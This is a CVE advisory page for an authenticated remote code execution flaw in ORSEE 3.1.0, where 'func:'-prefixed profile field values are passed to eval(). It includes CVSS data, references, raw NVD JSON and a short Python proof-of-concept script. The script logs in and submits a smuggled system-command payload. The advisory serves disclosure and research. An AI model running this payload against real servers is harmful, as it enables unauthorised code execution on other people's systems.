CVE-2025-67031

Description

ORSEE (Online Recruitment System for Economic Experiments) 3.1.0 contains an authenticated Remote Code Execution vulnerability in the participant profile field processing subsystem. Certain field configurations accept values beginning with the prefix "func:" which are passed directly into an eval() call inside tagsets/participant.php and tagsets/options.php.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

ORSEE 3.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC Concept for CVE-2025-67031
# Target: ORSEE 3.1.0

import requests

login_url = "http://target-site/public/login.php"
update_url = "http://target-site/participant_profile.php"

session = requests.Session()

# 1. Login as low-privileged user
creds = {'user': 'testuser', 'pass': 'password'}
session.post(login_url, data=creds)

# 2. Exploit the 'func:' prefix in profile field
# The input 'func:system("id")' is passed to eval()
payload = "func:system('id');"

data = {
    'vulnerable_field_name': payload,
    'submit': 'Save'
}

response = session.post(update_url, data=data)

if response.status_code == 200:
    print("Payload sent. Check server response or logs for execution.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67031
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67031
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67031/
[4] VulDB https://vuldb.com/cve/CVE-2025-67031
[5] https://github.com/orsee/orsee/archive/refs/tags/orsee_3.1.0.zip
[6] https://medium.com/@erabhishekshroti/cve-2025-67031-remote-code-execution-in-orsee-3-1-0-2bfc71d6d5eb

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67031", "sourceIdentifier": "[email protected]", "published": "2026-05-15T20:16:45.120", "lastModified": "2026-05-18T20:17:10.873", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ORSEE (Online Recruitment System for Economic Experiments) 3.1.0 contains an authenticated Remote Code Execution vulnerability in the participant profile field processing subsystem. Certain field configurations accept values beginning with the prefix \"func:\" which are passed directly into an eval() call inside tagsets/participant.php and tagsets/options.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/orsee/orsee/archive/refs/tags/orsee_3.1.0.zip", "source": "[email protected]"}, {"url": "https://medium.com/@erabhishekshroti/cve-2025-67031-remote-code-execution-in-orsee-3-1-0-2bfc71d6d5eb", "source": "[email protected]"}]}}